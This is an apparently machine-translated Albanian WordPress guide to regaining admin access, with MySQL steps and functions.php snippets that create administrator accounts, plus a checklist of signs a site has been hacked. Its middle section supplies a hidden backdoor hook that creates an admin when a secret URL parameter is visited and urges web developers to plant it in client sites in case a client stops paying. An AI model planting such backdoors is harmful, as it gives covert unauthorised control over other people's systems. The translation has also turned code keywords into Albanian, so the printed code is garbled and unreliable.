Si të Hack Into në një Uebfaqe WordPress, Udhëzuesi i plotë

Si të hidhni një faqe në faqen e WordPress, udhëzuesi i plotë


Ne nuk e lejojmë, aprovojmë dhe inkurajojmë ndonjë sjellje të paligjshme ose dashakeqe! Qëllimi i këtij artikulli është të shpjegojë se si të kollitni ose rifitoni qasjen në një faqe WordPress që ju takon, ose që ju keni të drejta të redaktoni, administroni dhe hyrni. Farëdo që të bësh, ti po e bën vetë. Ne nuk jemi përgjegjës për veprimet tuaja. Ky udhëzues shërben vetëm për qëllime edukative.

Metodat e përshkruara do t’ju ndihmojnë të rimarrni hyrjen në faqe edhe nëse nuk keni më llogari, por do t’ju kërkojnë disa informacione rreth faqes dhe ato nuk do t’ju ndihmojnë të hidhni ndonjë instalim të rastësishëm të WordPress.

Në këtë udhëzues, ne jemi gati t’ju tregojmë:

  • Si të hakmosh në një faqe në internet WordPress
  • Si të krijoni një prapavijë në WordPress
  • Si të krijoni një llogari të re të përdoruesit përmes FTP
  • 10 shenja që faqja juaj e WordPress është hakuar

Si të hidhni një faqe në faqen e WordPress, udhëzuesi i plotë

Situatat në të cilat mund të ndihmoni veten

Nëse jeni në një nga situatat e mëposhtme, metodat tona do t’ju ndihmojnë të rimarrni qasjen:

  • harrove emrin e përdoruesit ose adresën e postës elektronike
  • opsioni i rivendosjes së fjalëkalimit nuk funksionon në serverin pritës
  • rivendosja e postave elektronike të fjalëkalimit nuk do të vijnë
  • nuk keni më hyrje në adresën e postës elektronike të llogarisë
  • ju e dini emrin e përdoruesit dhe fjalëkalimin, por kombinimi thjesht nuk funksionon

Për të përdorur metodat e përshkruara më poshtë, do t’ju duhet vetëm një nga sa vijon:

  • Qasja FTP në server, ose
  • Qasje cPanel në server, ose
  • qasje në bazën e të dhënave MySQL dhe mundësinë për t’u lidhur me të nga distanca

Metoda # 1 – mënyra MySQL

Përdorni këtë metodë për të ndryshuar fjalëkalimin (ose emrin e përdoruesit nëse është e nevojshme) të një përdoruesi ekzistues ose për të krijuar një llogari të re. Ju do të keni nevojë për qasje cPanel ose qasje të drejtpërdrejtë të MySQL në bazën e të dhënave të faqes. Le të fillojmë duke ndryshuar fjalëkalimin e një përdoruesi ekzistues.

Nëse jeni duke përdorur cPanel, hyrja (cPanel gjithmonë mund të arrihet përmes https://yoursite.com:2083 lidhje), gjetja dhe hapja e phpMyAdmin. Lista e bazave të të dhënave dhe tabelave është në të majtë. Po kërkoni tabelën që mbaron _users. Me siguri do të jetë wp_users, por nëse keni instaluar më shumë se një faqe WordPress në server, duhet të gjeni atë të duhurin.

Tabela e duhur do të ketë përdoruesin që dëshironi të redaktoni në të. Ndiqni të njëjtën procedurë nëse jeni duke u lidhur me MySQL përmes ndonjë klienti të jashtëm si SQLyog. Pasi të gjeni tabelën dhe regjistrimin aktual të përdoruesit, është koha për të ndryshuar fjalëkalimin.

Siç e keni kuptuar me siguri deri tani, fjalëkalimi ruhet në user_pass fushë, hashed duke përdorur algoritmin MD5. Hape gjenerator në internet MD5 shkruani fjalëkalimin që dëshironi të përdorni dhe klikoni “Hash”. Kopjoni vargun e gjeneruar dhe zëvendësoni fjalëkalimin origjinal me të. Në phpMyAdmin, ju mund të redaktoni fushën duke klikuar dyfish mbi të. Procedura është e ngjashme në klientët e tjerë MySQL. Ruani ndryshimet dhe identifikohuni në WordPress me fjalëkalimin tuaj të ri.

Tabela e përdoruesve të WP

Emrat e përdoruesve, fjalëkalimet hashed dhe emailet janë të ruajtura në wp_users tabela e bazës së të dhënave

Ende me metodën # 1 – krijimin e një përdoruesi të ri

Krijimi i një përdoruesi të ri është pak më i komplikuar por akoma i menaxhueshëm në më pak se një minutë. Krijoni një rekord të ri në tabelën e përdoruesve dhe populloni: user_login, user_pass (hashed, duke përdorur funksionin MD5 të përshkruar më lart) dhe user_email. Të gjitha fushat e tjera mund të mbeten bosh; nuk kanë rëndësi. Ruani rekordin e ri. Pasi të ruhet, MySQL do t’i japë një ID unike. Theshtë numri në fushën e ID. Mos harroni atë.

Tani shkoni tek _usermeta tabela. mbaj mend, parashtesa e tryezës duhet të jetë e njëjtë me atë të përdoruesve. Për shembull wp_users dhe wp_usersmeta. Nëse parashtesa nuk është e njëjtë, ju po redaktoni tabelën e gabuar (të disa instalimeve të tjera WP) dhe llogaria e re nuk do të funksionojë. Do të krijojmë dy rekorde të reja. Injoroni umeta_id fushë për të dy. i vendosur user_id fushë në vlerën që sapo kujtuat (vlera e re e ID në tabelën e përdoruesve). Për setin e parë të rekordeve meta_key në wpct_user_level dhe meta_value në 10. Për të dytën meta_key në wpct_capabilities dhe meta_value në a: 1: {s: 13: "administrator"; b: 1;}. Ruani të dy. Ju keni mbaruar – login!

Metoda # 2 – mënyra e funksioneve.php

Kjo qasje mund të përdoret ose duke redaktuar funksionet.php përmes cPanel ose duke përdorur një klient FTP për ta bërë këtë. Nëse përdorni cPanel gjeni File Manager dhe hapeni atë. Së pari, duhet të gjejmë dosjen e temës aktive.

Shko tek public_html / wp_content / themes folder. Nëse menjëherë shihni temën tuaj dhe e dini se cila është – e shkëlqyeshme. Hapni dosjen e saj dhe filloni të redaktoni functions.php. Nëse jo, hapni faqen, klikoni me të djathtën kudo, zgjidhni “Shihni burimin”. Pastaj shtypni Ctrl + F dhe filloni të shtypni / Tema / së shpejti do të keni shumë URL të theksuara dhe do të njihni emrin e dosjes së temës aktive.

Gjeni atë në strukturën e skedarit, hapni dhe filloni të redaktoni functions.php. Kopjoni / ngjitni kodin vijues në fund të skedarit. Mendoni mbylljen ?> Etiketat PHP nëse i keni. Ata duhet të jenë në rreshtin e fundit. Kështu që futni kodin para tyre.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

nëse (! username_exists ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (varg ('ID' => $ user_id, 'pseudonim' => $ new_user_email));

$ user = WP_User i ri ($ user_id);
$ User-> set_role ( 'administrator');
}

Redaktoni vetëm dy rreshtat e parë të kodit për të pasqyruar llogarinë tuaj të re. Nëse tashmë ka një përdorues në WP me atë email një llogari të re nuk do të krijohet, sigurohuni që është i ri. Ndryshoni gjithashtu fjalëkalimin – mos u hakoni nga kiddies me skriptet. Pasi ta keni ruajtur skedarin thjesht hapni faqen tuaj, kodi do të ekzekutohet, një llogari e re do të krijohen privilegje të administratorit dhe do të jeni në gjendje të regjistroheni me të.

Pasi ta keni bërë këtë, mos harroni të fshini kodin nga functions.php.

Metoda të tjera të hakerave

Duke ditur fjalëkalimin FTP, cPanel ose MySQL, po dëshmoni se keni të drejtë të ligjshme të hyrjes në server dhe për këtë arsye duhet të keni qasje edhe në instalimet e WordPress-it. Nëse nuk keni ndonjë nga ato llogari, atëherë nuk jeni mirë (hakimi në faqet e njerëzve të tjerë), dhe kjo nuk është mirë!

Ju lutemi mbani mend se fitimi i një aksesi të paautorizuar në çdo kompjuter, site ose server është një krim serioz dhe trajtohet menjëherë në shumicën e vendeve.

Nëse jeni të frikësuar se faqja juaj e WordPress mund të hakohet, ju lutemi kontrolloni këtë faqe me skaner të lirë të sigurisë WordPress. Nëse nuk keni kohë të krijoni blogun tuaj, le ta bëjmë këtë për ju.

Si të krijoni një prapavijë në WordPress

Kur dera e përparme është e mbyllur, mund të provoni derën e pasme. Kjo mund të tingëllojë si një mënyrë e keqe për të përdorur kodin për hyrjen në sit pa pasur hyrje në të, por në të vërtetë ka raste kur ju duhet të kontrolloni faqen tuaj nëse dikush e vodhi atë.

Nëse po krijon faqe në internet për njerëzit e tjerë diçka që ju bëni, herët a vonë do të ketë një klient që do të refuzojë t’ju paguajë për punën tuaj; një klient i cili do të fshijë informacionin tuaj të hyrjes dhe të marrë përsipër kontrollin e gjithçkaje që keni bërë. Ndonjëherë, do të jetë e mjaftueshme për të krijuar një përdorues të ri përmes FTP ose për të rivendosur një fjalëkalim. Kur nuk mjafton, ju mund të dëshironi të bllokoni rrugën tuaj prapa ose të krijoni një qasje në prapavijë në faqet tuaja të administratorit.

Por nëse vendosni të fshehni një pjesë të vogël të kodit në mjedisin tuaj WordPress, mund t’i kurseni vetes disa dinjitet dhe fitoni aksesin në faqen e WordPress me privilegje administratori. Dhe këtu fillojnë lojërat.

Pavarësisht se sa herë ky hajdut fshin informacionin tuaj ose rikthen një rezervë në një server që ai me siguri zotëron, ka një shans që ai nuk di asgjë për hyrjet në prapavijë. Nëse ai e bëri këtë, ai ndoshta nuk do të kishte nevojë edhe për ndihmën tuaj për të ngritur WordPress, apo jo?

Krijoni një prapavijë:

OK, mjaft me biseda; këtu është një pjesë e kodit që do t’ju duhet për të përfunduar punën:

  1. Hap skedarin e funksioneve.php
  2. Kopjoni / ngjitni kodin vijues:
  3. add_action ('wp_head', 'wploop_backdoor');
    funksioni wploop_backdoor ()
    Nëse ($ _GET ['backdoor'] == 'knockknock') {
    të kërkojë ( 'wp-përfshin / registration.php');
    Nëse (! Username_exists ('emrin e përdoruesit')) {
    $ user_id = wp_create_user ('emri', 'kaloj');
    $ user = WP_User i ri ($ user_id);
    $ User-> set_role ( 'administrator');
    }
    }
    }
    ?>
  4. Ruaj ndryshimet

Nëse e lini kodin ashtu siç është, gjithçka që duhet të bëni për të krijuar një administrator të ri në sit është vizita http://www.yourdomain.com/?backdoor=knockknock

Pasi të keni ngarkuar faqen, emri juaj i ri i përdoruesit është “Emri” dhe fjalëkalimin “Kalojë”.

Sigurisht, ju mund ta ndryshoni atë në kod më lart duke ndryshuar “emrin” dhe “kalimin” për çfarëdo që dëshironi. Ju gjithashtu mund të ndryshoni lidhjen në derën tuaj të pasme duke ndryshuar do prapavijë ’dhe / ose‘ knockknock ’për çdo gjë që keni ardhur.

Provoni funksionin – jo vetëm që është argëtuese, por me të vërtetë mund t’ju ndihmojë diku në të ardhmen, kur do të krijoni një faqe në internet për dikë që nuk mund t’i besoni plotësisht. Ju gjithashtu duhet të nivelizoni aftësitë tuaja në WordPress dhe Blogging.

Si të krijoni një llogari të re të përdoruesit përmes FTP

Krijimi i llogarive të reja të përdoruesve në WordPress është shumë e lehtë. Si një administrator, ju duhet të lundroni në faqen e administratorit të Përdoruesve ku mund të krijoni një llogari të re për çdo rol të përdoruesit. Kjo mund të bëhet brenda disa sekondave dhe një përdorues i krijuar rishtazi mund të regjistrohet menjëherë me emrin e përdoruesit dhe fjalëkalimin e dhënë.

Por çfarë ndodh nëse humbni hyrjen në administratorin tuaj të WordPress? Gjërat mund të bëhen pak më të komplikuara, por mos u shqetësoni – ne kemi një funksion për ju që mund të shpëtojë jetën tuaj të administratorit.

Nëse një administrator tjetër ka fshirë llogarinë tuaj, nëse i keni fshirë të gjithë përdoruesit nga baza e të dhënave gabimisht, keni përdorur një plugin mosfunksionues ose keni hakuar, ende mund të riktheheni në kontroll. Ndonjëherë ju mund të jeni në gjendje të merrni hyrje vetëm në serverin tuaj FTP ndërsa HTTP do të jetë jashtë mundësive tuaja dhe do t’ju duhet të krijoni një administrator të ri. Ndërsa kjo mund të jetë një rast i rrallë, funksioni i mëposhtëm do t’ju kursejë.

Për të krijuar një llogari të re jashtë mjedisit të administratorit të WordPress, gjithçka që do t’ju duhet është një qasje FTP në faqen tuaj. Si një administrator, ju duhet të keni të gjithë informacionin e nevojshëm për t’u kyçur në serverin tuaj dhe shpejt mund të krijoni një llogari të re duke krijuar një funksion të ri në temën tuaj.

Krijoni një llogari të re të përdoruesit përmes FTP:

  1. Hapni klientin FTP dhe lidheni me llogarinë tuaj
  2. Shkoni te përmbajtja / temat wp
  3. Hapni dosjen e temës që po përdorni
  4. Kërkoni për skedarin e funksioneve.php dhe modifikoni atë
  5. Kopjoni dhe ngjitni funksionin e mëposhtëm:
  6. funksioni admin_account ()
    $ user = 'Emri i përdoruesit';
    $ pass = 'Fjalëkalimi';
    $ email = '[email protected]';
    nëse (! username_exists ($ user) &&! email_exists ($ email)) {
    $ user_id = wp_create_user ($ user, $ pass, $ email);
    $ user = WP_User i ri ($ user_id);
    $ user-> set_role ('administratori');
    }}
    add_action ( 'init' admin_account ');
    
  7. Ndryshoni emrin e përdoruesit, fjalëkalimin dhe emailin në diçka unike
  8. Ruaj ndryshimet

Sigurohuni që emri i përdoruesit, fjalëkalimi dhe adresa e postës elektronike që keni vendosur në funksion të jenë unike ose përndryshe funksioni nuk do të funksionojë siç duhet. Pasi të keni ruajtur ndryshimet, keni përfunduar dhe mund të lundroni në panelin tuaj të hyrjes në WP. Përdorni informacione të reja për t’u kyçur dhe pasi të keni verifikuar llogarinë, mund të fshini funksionin nga skedari i funksioneve.php.

Funksioni i treguar më lart krijon një llogari admin por ju lehtë mund ta modifikoni atë për të krijuar një llogari me ndonjë rol tjetër të përdoruesit. thjesht ndryshoni rolin në 8th rresht të kodit për redaktorin, autorin, kontribuesit, pajtimtarin ose ndonjë rol tjetër të përdoruesit që keni krijuar.

Fatkeqësisht, nëse keni humbur llogarinë tuaj të administratorit, ju gjithashtu keni humbur të gjitha postimet e shkruara nën atë emër përdoruesi. Kjo është arsyeja pse ju gjithmonë duhet të mbani një kopje rezervë të cilën mund ta merrni lehtësisht. Nëse po e lexoni këtë ndërsa keni llogarinë tuaj të administratorit, merrni këtë si një kujtesë për të krijuar menjëherë një kopje rezervë dhe bookmark këtë artikull vetëm në rast se ju duhet të krijoni një llogari jashtë WordPress në të ardhmen.

10 shenja që faqja juaj e WordPress është hakuar

WordPress është një platformë e madhe për Blogging. Ka miliona përdorues dhe duket se numri po rritet me shpejtësi çdo ditë. Njerëzit madje kanë tendencë të transferojnë faqet e tyre të internetit të krijuara në sisteme të tjera të menaxhimit të përmbajtjes në këtë sistem me burim të hapur më shpesh nga sa mendoni. Dhe, ndërsa kjo është mirë, kjo do të thotë se hakerat gjithashtu do të vendosin WordPress në një numër një-vend kur përpiqen të pushtojnë faqe të rastit.

Zakonisht, nëse hakoheni, do të dini për këtë menjëherë. Faqja juaj do të bëhet e paarritshme; ju nuk do të jeni në gjendje të regjistroheni dhe nganjëherë një haker do të lërë madje një mesazh në faqen e parë. Por më shpesh sesa jo, madje nuk mund të vini re që diçka ka ndryshuar. Në këtë pjesë të artikullit, ne do të tregojmë disa shenja që mund t’ju tregojnë se faqja juaj e WordPress u hakua dhe disa zgjidhje për problemin.

1. Identifikim i pasuksesshëm

Kjo shenjë është shumë e dukshme. Nëse keni përdorur një kombinim të emrit të përdoruesit dhe fjalëkalimit për një kohë pa pasur probleme, mund të dyshoni nëse papritmas WordPress nuk e njeh llogarinë tuaj. Nëse një haker duhet të regjistrohet në faqen tuaj, shanset janë që ai të ndryshojë shpejt privilegjet tuaja të administratorit.

Ndoshta ai duhet të ndryshojë fjalëkalimin tuaj ose të fshijë plotësisht llogarinë tuaj. Para se të filloni të panikoni pasi herën e parë që WordPress ju porosit për emrin / fjalëkalimin e pasaktë, ju lutemi merrni parasysh faktin se mund të keni hyrë në një kombinim të gabuar ose që mund të keni ndezur butonin për mbylljen e kapakëve.

zgjidhje: Provoni të rimarrni fjalëkalimin përmes postës elektronike ose përdorni një llogari tjetër për t’u kyçur. Për t’u siguruar që hyrja të mbetet e sigurt, ju rekomandojmë të instaloni Identifikohu Ninja shtojcë për WordPress.

2. Përmbajtja me qëllim të keq shtohet në faqen tuaj

Sajti përmban një paralajmërim të malware

Nëse filloni të vini re përmbajtje të panjohura në faqen tuaj, mund të filloni të shqetësoheni. Kur ata marrin një shans për të hyrë në zonën tuaj të administratorit, hakerat do të jenë në gjendje të ndryshojnë thelbin tuaj dhe skedarët tuaj dhe skedarët e shtojcave. Kjo do të thotë që ata duhet të ndryshojnë gjithçka që dëshirojnë.

Ndërsa disa hakerë do të modifikojnë në mënyrë drastike pamjen e faqes tuaj dhe mbase madje të parashikojnë se keni hakuar, të tjerët do të jenë shumë më delikatë për këtë.

zgjidhje: Provoni të kërkoni përmbajtje të fshehur në kodin e faqes në internet. Mund të ketë lidhje me hakerat e faqeve me qëllim të keq, të mbjellë në themelet e faqes tuaj, ose ata mund të kenë instaluar popup, të cilët do të hapen rregullisht për klientët tuaj. Përdorni Sigurinë Ninja për të skanuar faqen tuaj ose për të monitoruar vazhdimisht faqen tuaj për probleme të tilla.

3. Vizita të dyshimta

Nëse nuk jeni duke ndjekur faqen tuaj të internetit, duhet të filloni ta bëni këtë menjëherë. Një mënyrë e thjeshtë për të bërë është përdorimi i Google Analytics i cili, midis shumë karakteristikave të tjera, mund t’ju tregojë se sa vizita merrni dhe nga vijnë ato vizita. Pas ca kohësh, do të njiheni me faqen tuaj të internetit. Kjo do të thotë që ju do të dini se nga vijnë vizitat, do të dini kur filloni një fushatë të re dhe kur ka lidhje të reja promovimi të lëshuara në natyrë.

Por nëse papritur vëreni që faqja juaj po merr një numër të madh të vizitave të reja nga fusha e dyshimtë, do të doni të hetoni këtë më tej sepse faqja juaj thjesht mund të hakohet. Zakonisht, kjo lloj vizite do të rezultojë në një normë fryrje 100% që do të thotë se është arritur vetëm në një faqe. Hakerët shpesh do të përdorin sisteme të automatizuara që do të çojnë faqe të tjera të këqija në tuajat. Pavarësisht nëse është kodi i keq që ekzekutohet në faqen tuaj ose ju jeni bërë pjesë e një rrjeti spamming, gjërat mund të bëhen serioze, dhe ju do të duhet të kontrolloni faqen tuaj për kodin me qëllim të keq.

zgjidhja: përdorim Mjetet e uebfaqeve të Google për të gjetur fusha të dyshimta

4. Një rënie e papritur e trafikut

Shfletimi i sigurt Statusi i Ssite

Për dallim nga shenja e përmendur e fundit e hakimit, kjo mund të ju alarmojë sepse papritmas ka një rënie të numrit të vizitave. Në vend që t’ju referohen vizita të reja, një haker mund të dërgojë vizita larg faqes tuaj. Kjo mund të ndodhë sepse një haker i ridrejtoi faqen tuaj një tjetri. Arsyeja tjetër për të marrë më pak vizitorë është se Google renditi në faqen e zezë faqen tuaj. Ky veprim do të tregojë një mesazh për çdo përdorues që mund të zgjedhë të mos hapë faqen tuaj sepse është i infektuar.

zgjidhje: Përdorni Google Statusi i faqes së shfletimit të sigurt për të kontrolluar nëse faqja juaj është shënuar si e pasigurt dhe aktualisht është e rrezikshme për tu vizituar.

5. Rezultatet e motorit të kërkimit janë të çuditshme

Nëse nuk keni vërejtur ndonjë ndryshim në faqen tuaj, por zbuloni se rezultatet e kërkimit në Google dhe motorët e tjerë të kërkimit janë të çuditshme (tregoni tituj të ndryshëm dhe meta të dhëna të tjera), kjo mund të jetë një shenjë e qartë e një faqe të hackuar. Një haker mund të ketë ndryshuar përmbajtjen tuaj në një mënyrë që mund të jetë e dukshme vetëm për një ekspert. Megjithatë, ndryshimi do të jetë i dukshëm në rezultatet e motorit të kërkimit.

zgjidhje: Kontrolloni faqen tuaj me Mjetet e uebfaqeve të Google, dhe kontrolloni nëse faqja juaj u hakua me këtë mjet falas online.

6. Ju nuk mund të dërgoni / merrni email

Sapo një haker të hyjë në faqen tuaj, ai me siguri do të dëshirojë përdorni serverin tuaj për të spaminuar të gjithë të tjerët. Kur të zbuloni se nuk mund të dërgoni ose të merrni postë elektronike të reja nga WordPress tuaj, kjo mund të jetë një shenjë e qartë se keni hakuar. Kontrolloni edhe një herë emailin tuaj, atëherë kontrollojeni atë me ofruesin tuaj për t’u siguruar që nuk ka gabime.

zgjidhje: Testoni WordPress-in tuaj funksioni i postës me këtë plugin falas.

7. Sajti nuk ekziston

Serveri nuk u gjet

Ka raste kur hakerat nuk kanë qasje në faqen tuaj për të mbjellë kod me qëllim të keq, për të ridrejtuar përdoruesit ose për të përdorur emailin tuaj për spam. Ndonjehere, gjithçka që ata do të duan të bëjnë është të rrëzoni faqen tuaj. Rrallë, një haker do të fshijë me sukses gjithçka nga i gjithë serveri. Kjo është arsyeja pse është e rëndësishme që ju të strehoni skedarët tuaj në një kompani të njohur pritëse, e cila do të marrë siguri dhe gjithashtu do të mbajë kopje rezervë ditore ose të paktën javore të faqes tuaj. Shtë një praktikë e mirë që gjithashtu të bëni kopje rezervë tuaj herë pas here në mënyrë që faqja të rikthehet shpejt.

zgjidhje: Instaloni një nga shtojcat më të mira për menaxhimin e kopjimit në WordPress.

8. Skedarët e dyshimtë

Ngjashëm me përmbajtjen me qëllim të keq që mund të shtohet në skedarët ekzistues, një haker mund të mbjellë skedarë shtesë kudo brenda dosjes tuaj root. Shtë një gjë e mirë të dini rrugën tuaj rreth WordPress, por nëse nuk jeni aq me përvojë, duhet të keni në dispozicion një mjet sigurie që mund të kontrollojë të gjitha skedarët dhe aktivitetet tuaja. Kohët e fundit, ne shqyrtuam Sigurinë Ninja i cili është një mjet i përsosur për kontrollimin e të gjithë skedarëve tuaj të WordPress.

zgjidhje: Provoni të kërkoni skedarë që nuk i përkasin instalimit tuaj WordPress. Përdorni Security Ninja për të skanuar faqen tuaj rregullisht dhe për të gjetur ato skedarë automatikisht. Pastaj fshini skedarët ose hiqni kodin me qëllim të keq nga skedarët e infektuar. Mos harroni shtesën Core Scanner për Sigurinë Ninja.

9. Anëtarët e rinj

Në varësi të faqes tuaj, ju mund të jeni i vetmi në gjendje të shtoni anëtarë të rinj. Në atë rast, një email që ju tregon për përdoruesit e regjistruar rishtazi mund të shkaktojë alarm. Nëse ka administratorë të tjerë që kanë aftësinë për të shtuar anëtarë të rinj, kontrolloni me ta për aktivitetin e dyshimtë.

zgjidhje: Ndryshoni URL-në e hyrjes me një plugin falas, kufizoni hyrjen në faqen tuaj të hyrjes në WordPress duke përdorur skedarin .htpasswd dhe përdorni Log Ninja për të mbrojtur formën tuaj të hyrjes gjatë gjithë kohës.

10. Kontrolloni ngjarjet e planifikuara në serverin tuaj

Ndonjëherë, një haker nuk do të bëjë asgjë në faqen tuaj të internetit pasi të gjejë rrugën e vet. Në vend të kësaj, ata do të lënë ngjarje të planifikuara e cila mund të dëmtojë faqen tuaj diku në të ardhmen. Kjo teknikë është e rrezikshme sepse një haker mund të lërë mashtrim të papërvojë të viktimave në fillim. Ju mund të infektoheni dhe nuk dini asgjë për të.

zgjidhje: Kontrolloni punët tuaja CRON në një server që po përdorni dhe sigurohuni që nuk ka detyra të planifikuara të dyshimta.

Duke përfunduar

Shpresojmë që ky artikull të ju ndihmojë të menaxhoni edhe një faqe më të sigurt të WordPress dhe se do t’ju ndihmojë të rimarrni qasjen në të në situata të këqija. dhe edhe nëse faqja juaj është e pastër, ju lutemi mos e merrni si të mirëqenë.
Gjithmonë sigurohuni që blog-u juaj të jetë aq i sigurt sa mund të jetë. Ne sugjerojmë shtojcat e sigurisë për WordPress të cilat mund të ju kursejnë shumë herë. Prapëseprapë, nuk do të jetë ai që përdor fjalëkalimin e pasigurt dhe ki kujdes kur hak në faqen tënde të WordPress-it.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map